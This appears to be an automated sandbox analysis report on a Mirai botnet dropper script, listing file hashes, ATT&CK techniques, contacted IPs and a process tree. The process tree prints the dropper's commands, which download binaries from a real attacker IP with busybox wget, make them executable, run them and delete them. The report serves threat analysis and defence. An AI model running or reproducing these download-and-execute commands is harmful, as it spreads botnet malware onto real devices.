mirai | dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa

Analysis

max time kernel
116s
max time network
145s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
17/02/2025, 17:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

1KB
MD5

d011eee1c3ee60b1a1db3ae1e9e65ad6
SHA1

18f4cee16484157375f8bbcf21acca220a258d66
SHA256

dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa
SHA512

ed73548c60e65449f31d4bc5ca644d2f59e72d0843a24b3236707338fbed8e26ed608897d0c5a26a971357e7d28b92a9ecb6d8d76d5f7d55e93bf0aa3dd3f6ac

Score

10^/10

mirai botnet botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

BOTNET

Extracted

Family

mirai

Botnet

BOTNET

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (81223) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 6 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
834	busybox
839	busybox
844	busybox
741	busybox
824	busybox
829	busybox

Deletes itself 1 IoCs

pid	Process
845	jklmips

Executes dropped EXE 6 IoCs

ioc	pid	Process
/tmp/jklarm	742	wget.sh
/tmp/jklarm5	825	wget.sh
/tmp/jklarm6	830	wget.sh
/tmp/jklarm7	835	wget.sh
/tmp/jklm68k	840	wget.sh
/tmp/jklmips	845	wget.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/misc/watchdog	jklmips
File opened for modification	/dev/watchdog	jklmips

Renames itself 1 IoCs

pid	Process
845	jklmips

Unexpected DNS network traffic destination 13 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	194.36.144.87
Destination IP	152.53.15.127
Destination IP	152.53.15.127
Destination IP	152.53.15.127
Destination IP	152.53.15.127
Destination IP	194.36.144.87
Destination IP	194.36.144.87
Destination IP	194.36.144.87
Destination IP	152.53.15.127
Destination IP	152.53.15.127
Destination IP	168.235.111.72
Destination IP	194.36.144.87
Destination IP	81.169.136.222

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	jklmips

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	845	jklmips

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	jklmips

Reads runtime system information 19 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/671/status	jklmips
File opened for reading	/proc/674/status	jklmips
File opened for reading	/proc/693/status	jklmips
File opened for reading	/proc/329/status	jklmips
File opened for reading	/proc/439/status	jklmips
File opened for reading	/proc/378/status	jklmips
File opened for reading	/proc/691/status	jklmips
File opened for reading	/proc/141/status	jklmips
File opened for reading	/proc/165/status	jklmips
File opened for reading	/proc/330/status	jklmips
File opened for reading	/proc/379/status	jklmips
File opened for reading	/proc/386/status	jklmips
File opened for reading	/proc/683/status	jklmips
File opened for reading	/proc/325/status	jklmips
File opened for reading	/proc/328/status	jklmips
File opened for reading	/proc/714/status	jklmips
File opened for reading	/proc/718/status	jklmips
File opened for reading	/proc/239/status	jklmips
File opened for reading	/proc/355/status	jklmips

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
847	busybox
843	busybox
845	jklmips

Writes file to tmp directory 7 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jklarm6	busybox
File opened for modification	/tmp/jklarm7	busybox
File opened for modification	/tmp/jklm68k	busybox
File opened for modification	/tmp/jklmips	busybox
File opened for modification	/tmp/jklmpsl	busybox
File opened for modification	/tmp/jklarm	busybox
File opened for modification	/tmp/jklarm5	busybox

/tmp/wget.sh
/tmp/wget.sh
1⤵
- Executes dropped EXE
PID:714
- /bin/busybox
  /bin/busybox wget http://193.143.1.32/jklarm -O jklarm
  2⤵
  - Writes file to tmp directory
  PID:715
- /bin/busybox
  /bin/busybox chmod +x jklarm
  2⤵
  - File and Directory Permissions Modification
  PID:741
- /tmp/jklarm
  ./jklarm exploit
  2⤵
  PID:742
- /bin/busybox
  /bin/busybox rm -rf jklarm
  2⤵
  PID:744
- /bin/busybox
  /bin/busybox wget http://193.143.1.32/jklarm5 -O jklarm5
  2⤵
  - Writes file to tmp directory
  PID:745
- /bin/busybox
  /bin/busybox chmod +x jklarm5
  2⤵
  - File and Directory Permissions Modification
  PID:824
- /tmp/jklarm5
  ./jklarm5 exploit
  2⤵
  PID:825
- /bin/busybox
  /bin/busybox rm -rf jklarm5
  2⤵
  PID:827
- /bin/busybox
  /bin/busybox wget http://193.143.1.32/jklarm6 -O jklarm6
  2⤵
  - Writes file to tmp directory
  PID:828
- /bin/busybox
  /bin/busybox chmod +x jklarm6
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/jklarm6
  ./jklarm6 exploit
  2⤵
  PID:830
- /bin/busybox
  /bin/busybox rm -rf jklarm6
  2⤵
  PID:832
- /bin/busybox
  /bin/busybox wget http://193.143.1.32/jklarm7 -O jklarm7
  2⤵
  - Writes file to tmp directory
  PID:833
- /bin/busybox
  /bin/busybox chmod +x jklarm7
  2⤵
  - File and Directory Permissions Modification
  PID:834
- /tmp/jklarm7
  ./jklarm7 exploit
  2⤵
  PID:835
- /bin/busybox
  /bin/busybox rm -rf jklarm7
  2⤵
  PID:837
- /bin/busybox
  /bin/busybox wget http://193.143.1.32/jklm68k -O jklm68k
  2⤵
  - Writes file to tmp directory
  PID:838
- /bin/busybox
  /bin/busybox chmod +x jklm68k
  2⤵
  - File and Directory Permissions Modification
  PID:839
- /tmp/jklm68k
  ./jklm68k exploit
  2⤵
  PID:840
- /bin/busybox
  /bin/busybox rm -rf jklm68k
  2⤵
  PID:842
- /bin/busybox
  /bin/busybox wget http://193.143.1.32/jklmips -O jklmips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:843
- /bin/busybox
  /bin/busybox chmod +x jklmips
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /tmp/jklmips
  ./jklmips exploit
  2⤵
  - Deletes itself
  - Modifies Watchdog functionality
  - Renames itself
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:845
- /bin/busybox
  /bin/busybox rm -rf jklmips
  2⤵
  - System Network Configuration Discovery
  PID:847
- /bin/busybox
  /bin/busybox wget http://193.143.1.32/jklmpsl -O jklmpsl
  2⤵
  - Writes file to tmp directory
  PID:849

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/jklarm

Filesize
54KB

MD5
60323049a9468c264a9535600a053b6e

SHA1
960ec393b1590fee232414d8d8f279b189573b6f

SHA256
3ac4757c406bac2bedd2771c5c137607e2788099782ca939cb40c32aa2c71343

SHA512
e1e33d7bf40b34e4a90a88b2ada4822dc150ae705ae118f2a169f1dc427a4bad4fcc6a0e3e668483024395ae9005d2bef1ac82952774b359063dbc6f32e44954

Download Submit
/tmp/jklarm5

Filesize
54KB

MD5
368f814e3fcc026df077492406916cfb

SHA1
94a499401b79d75a6c1df3eb205dc44057425f5b

SHA256
4cb919fe578f5a95e86157987898bb2959019260992578f42e7abd79f3d864ce

SHA512
e334932543ea5bead5ea96f13191f967e63893b92ffa2fe6793afe5d39615f46c2b62ab4ff8846f78cffeb32dd51ae6a88ba36dd59cab8da75a1cbd0f1b842cc

Download Submit
/tmp/jklarm6

Filesize
65KB

MD5
3efe981dfb09404a90020f31b91a0d99

SHA1
75dad217f8faab13473fa87f1f90cfab16646e67

SHA256
b0200c4648356ccc6af1711e1673c133c8f785611b10d49f925958507bb8b213

SHA512
6f5068a4d9fa7e6db711cb6207a3316a24d58d68e6996e211d6a10ac5eee3b67adbd8677d7f4061eac2476b5596c9c767055ab3a19bcf569137c7ca3ed8177fc

Download Submit
/tmp/jklarm7

Filesize
77KB

MD5
82feacfdba7096dd1f30ae81b443ed99

SHA1
1ffc5f931d6bbf76e3ae065033fc5cb95a9e8a33

SHA256
dec770c2901a222ec48915adfe1f7c6091fc3e9b03941a53f44b21593af862d2

SHA512
07f59c67b2c32911d031816713ad9bcd36f2b3beaf9c7645c1d3b73fc29fb2d09aef648a08fd6f83037bf3731d287babcfc7c228fac7af465bc79ad325477c9d

Download Submit
/tmp/jklm68k

Filesize
55KB

MD5
0e6cf4992f8f2394394ca5972339a663

SHA1
acd7245a3e7b0f394100658336e10aaa2774771d

SHA256
30c5e7b561a3e61ab67af8181fd6b996258325bf8137531ffe9d2b3f438a3d46

SHA512
66f9c4f37e8c039a2b435a213629992a88b15609f3d449b1552a5aade52981d8679b1f949b35d9edfc2522a2c5acd4efbb4ed55b64ec08d55818205b8cc78c10

Download Submit
/tmp/jklmips

Filesize
70KB

MD5
9f505111a75f65954723020bee516bc1

SHA1
0aa2fbd97682553fcfd5a6494e09498c04df96b3

SHA256
5e2d9f9531aff471dd5d92b772c57ba66cfb39aefef46fb878f3d30db9a8c1c8

SHA512
66fe3d79c76e4c773b6512f90ed9b3dd60cba157882a8093931c60c5771191c1c8442ee96121fb9e578056dfa91a6878f4271e1e2e02fdd4c73d50e33ceac640

Download Submit
/tmp/jklmpsl

Filesize
44KB

MD5
14db88806683f1a4d4f0a7913f773cec

SHA1
b8fad0ca0887b54a42449fe219e5ecf3431d44d7

SHA256
493357920c561694abd7a519d7ad4e372182ea9c1678bff85811f0a4f055c68b

SHA512
fd881538b367aef19206358c998174bcba1a7480eb63f67719e702086ed2f958a74703aac6e5ddccd2027d3c0550516fc9cd6536de8247f96b7da8601b619fd1

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads